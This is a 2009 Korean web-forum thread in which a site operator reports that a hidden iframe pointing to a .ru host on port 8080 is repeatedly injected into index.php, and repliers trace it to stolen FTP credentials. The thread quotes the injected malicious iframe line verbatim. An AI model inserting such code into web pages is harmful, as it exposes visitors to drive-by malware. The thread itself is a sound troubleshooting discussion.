묻고답하기
index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다.
2009.09.17 00:18
안녕하세요?
제목 그대로 index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다.
먼저 index.php 의 내용 가장 아래 쪽에 아래와 같은 소스가 저도 모르게 삽입된 것을 확인했습니다.
<div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=195 height=255 ></iframe></div>
이상하게 사이트 운영자인 제 컴퓨터에서는 정상적으로 접속이 되는데
다른 회원님들의 컴퓨터에서는 사이트 접속이 안 된다는 연락이 오더군요.
그래서 index.php 파일을 원본 파일로 교체하니 정상적인 접속이 되었습니다.
그런데 3일 연속으로 index.php 파일에 저 소스가 저절로 삽입이 되는군요.
이게 해킹되어서 그런 것인지 잘 모르겠습니다.
구글에서 저 소스를 검색해보니 2시간 전에 올라온 해외의 내용이 검색이 되더군요. 영어가 아니라서 해석은 못 했습니다.
http://www.r10.net/wordpress/459639-her-gun-iframe.html
일단 서버 회사에도 문의를 해볼 생각입니다만,
혹시 위 내용에 대해서 정보를 아시는 분이 계시다면 좀 알려주시면 고맙겠습니다. ^^
댓글 3
-
뉴클리어
2009.09.17 00:23
-
디따마니
2009.09.17 00:35
저도 그랬었는데 이유는 ftp 아이디/비번이 노출된겁니다.
ftp 아이디/비번 빼가는 악성코드에 걸린 컴퓨터에서 로그인한 순간 노출된 거지요.
수정된 파일 원래대로 복구하신 후
ftp 아이디/비번 바꾸세요
아래는 제가 올렸던 질문입니다. 참고하세요
-
RainSky
2009.09.17 00:47
먼저 위에 답변 남겨주신 분들에게 진심으로 감사의 말씀부터 전합니다.
위 질문을 남기고 나서 검색을 해보니 XE 팁 게시판에 자세한 내용이 올라와 있더군요.
http://www.xpressengine.com/18213404
조금 더 자세히 알아볼 필요가 있겠네요.
안녕하세요.
저도 인터넷 막 뒤집다 보니까.
신종바이러스 아이프레임 이라네요.
~~~~.ru , cn 도메인의 8080에 Iframe 로되있으면 99.9997 % 입니다. ( 0.0003% 로 안그럴수만 있으면. )
바이러스 백신을 켜서 정밀검사를 해보세요.
이 외에는 ...